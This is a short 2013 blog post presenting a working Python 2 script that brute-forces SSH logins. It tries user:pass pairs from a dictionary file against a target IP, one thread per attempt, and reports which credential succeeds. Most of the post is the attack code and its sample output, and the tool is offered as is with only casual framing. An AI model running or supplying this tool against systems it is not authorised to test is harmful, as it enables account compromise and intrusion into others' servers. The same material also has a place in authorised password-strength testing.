<h1>Simple python SSH brute forcer</h1>
<p>Published 2013-01-20 at <a href="https://www.phillips321.co.uk/2013/01/20/simple-python-ssh-brute-forcer/">https://www.phillips321.co.uk/2013/01/20/simple-python-ssh-brute-forcer/</a></p>
<p>So I got bored this evening and decided to write a quick and simple python SSH bruteforcer (I wanted to learn how to use paramiko).</p>
<p>It takes the dictionary in a <em>user:pass</em> format.</p>
<p>It's not the most efficient, as it throttles with a 300 ms sleep between attempts; if I get the time to play, I'll use some form of thread queuing so that you can throttle the requests properly. It might also be useful to reattempt SSH connect failures (as opposed to authentication failures) to ensure there are no missed attempts.</p>
<p>But here it is anyway:</p>
<pre><code class="python">#!/usr/bin/env python
# Python 2 script: one thread per user:pass line, 300 ms apart.
import paramiko, sys, time, threading

if len(sys.argv) &lt; 3:
    print "Usage: %s IP /path/to/dictionary" % (str(sys.argv[0]))
    print "Example: %s 10.0.0.1 dict.txt" % (str(sys.argv[0]))
    print "Dictionary should be in user:pass format"
    sys.exit(1)

ip = sys.argv[1]
filename = sys.argv[2]

fd = open(filename, "r")

def attempt(IP, UserName, Password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(IP, username=UserName, password=Password)
    except paramiko.AuthenticationException:
        # Only a rejected credential is caught; connect errors propagate.
        print '[-] %s:%s fail!' % (UserName, Password)
    else:
        print '[!] %s:%s is CORRECT!' % (UserName, Password)
    ssh.close()
    return

print '[+] Bruteforcing against %s with dictionary %s' % (ip, filename)
for line in fd.readlines():
    # Each dictionary line is "user:pass"
    username, password = line.strip().split(":")
    t = threading.Thread(target=attempt, args=(ip, username, password))
    t.start()
    time.sleep(0.3)

fd.close()
sys.exit(0)
</code></pre>
<p>And the running of the code:</p>
<pre><code class="bash">user@linux:$ python ssh-dict.py 127.0.0.1 dict
[+] Bruteforcing against 127.0.0.1 with dictionary dict
[-] user:pass fail!
[-] admin:password fail!
[-] guest:password1 fail!
[-] kerry:test fail!
##### SNIP
[-] user5:password6 fail!
[-] user5:password7 fail!
[!] validuser:validpassword is CORRECT!
[-] user5:password8 fail!
##### SNIP
</code></pre>